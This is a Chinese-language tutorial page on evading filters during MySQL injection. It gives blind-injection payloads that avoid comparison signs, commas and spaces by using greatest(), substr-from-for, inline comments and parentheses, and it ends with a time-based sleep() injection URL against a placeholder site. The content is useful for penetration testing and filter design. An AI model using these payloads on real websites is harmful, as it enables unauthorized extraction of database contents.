MySQL注射的过滤绕过技巧

previous page next page

若非以上类型,则可能需要暴力猜解。猜解时,可能会遇到一些限制。攻击者要做的,就是将其个个击破。

1. 通过greatest函数绕过不能使用大小于符号的情况

猜解单个字符时,通常使用折半查找。

  1. mysql> select ascii(mid(user(),1,1)) < 150;
  2. +------------------------------+
  3. | ascii(mid(user(),1,1)) < 150 |
  4. +------------------------------+
  5. |                            1 |
  6. +------------------------------+

以上是判断user()第一个字符的ascii码是否小于150. 若小于150,返回true(1),否则返回false(0), 可以看到,需要使用到大小于符号。

比如,对于一个boolean based注入。尝试:

  1. http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) < 150
  3. http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) >= 150

上述两个页面返回的内容应该是不同的。

但问题是,有些情形下,我们是不能使用大小于符号的(<>),被过滤了,此时,可以通过greatest函数绕过。

greatest(a,b),返回a和b中较大的那个数。

当我们要猜解user()第一个字符的ascii码是否小于等于150时,可使用:

  1. mysql&gt; select greatest(ascii(mid(user(),1,1)),150)=150;
  2. +------------------------------------------+
  3. | greatest(ascii(mid(user(),1,1)),150)=150 |
  4. +------------------------------------------+
  5. |                                        1 |
  6. +------------------------------------------+

如果小于150,则上述返回值为True。

2. 通过substr函数绕过不能使用逗号的情况

不能使用逗号的情况较少,往往是因为逗号有某些特殊的作用,被单独处理了。

通常,猜解都是要用到逗号的,因为需要mid函数取字符:

  1. ascii(mid(user(),1,1))=150

绕过的方法是使用from x for y。语法类似:

  1. mid(user() from 1 for 1)
  3. substr(user() from 1 for 1)

以上同样是从第一个字符开始,取一位字符。

那么,不带逗号注入的语法,就可以变成:

  1. mysql&gt; select ascii(substr(user() from 1 for 1)) &lt; 150;
  2. +------------------------------------------+
  3. | ascii(substr(user() from 1 for 1)) &lt; 150 |
  4. +------------------------------------------+
  5. |                                        1 |
  6. +------------------------------------------+

是不是跟mid函数的效果是一样的,又没有用到逗号。

在空格被过滤的情况下如何注入

SQL注入时,空格的使用是非常普遍的。比如,使用union来取得目标数据:

  1. http://www.xxx.com/index.php?id=1 and 0 union select null,null,null

上面的语句,在and两侧、union两侧、select的两侧,都需要空格。

1. 注释绕过空格

这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在MySQL中,用

  1. /*注释*/

来标记注释的内容。比如SQL查询:

  1. select user() from dual

我们用注释替换空格,就可以变成:

  1. select/**/user()/**/from/**/dual

如下图,SQL命令能够正确执行:

2. 括号绕过空格

空格被过滤,但括号没有被过滤,可通过括号绕过。

我的经验是,在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。

括号绕过空格的方法,在time based盲注中,是屡试不爽的。

举例说明,有这样的一条SQL查询:

  1. select user() from dual where 1=1 and 2=2

如何把空格减到最少?

观察到user()可以算值,那么user()两边要加括号,变成:

  1. select(user())from dual where 1=1 and 2=2;

继续,1=1和2=2可以算值,也加括号,去空格,变成:

  1. select(user())from dual where(1=1)and(2=2)

dual两边的空格,通常是由程序员自己添加,我们一般无法控制。所以上面就是空格最少的结果。

这两篇介绍了一些基础的内容,用常用的一条time based盲注语句做个总结:

  1. http://www.xxx.com/index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109))

这条语句是猜解user()第二个字符的ascii码是不是109,若是109,则页面加载将延迟,返回正负为<0,1>,不过在延时比较大时不好用,用<sleep(abs(ascii(mid(lower(user()),1,1))-53))>它:

1) 既没有用到逗号、大小于符号

2) 也没有使用空格

却可以完成数据的猜解工作!

previous page start next page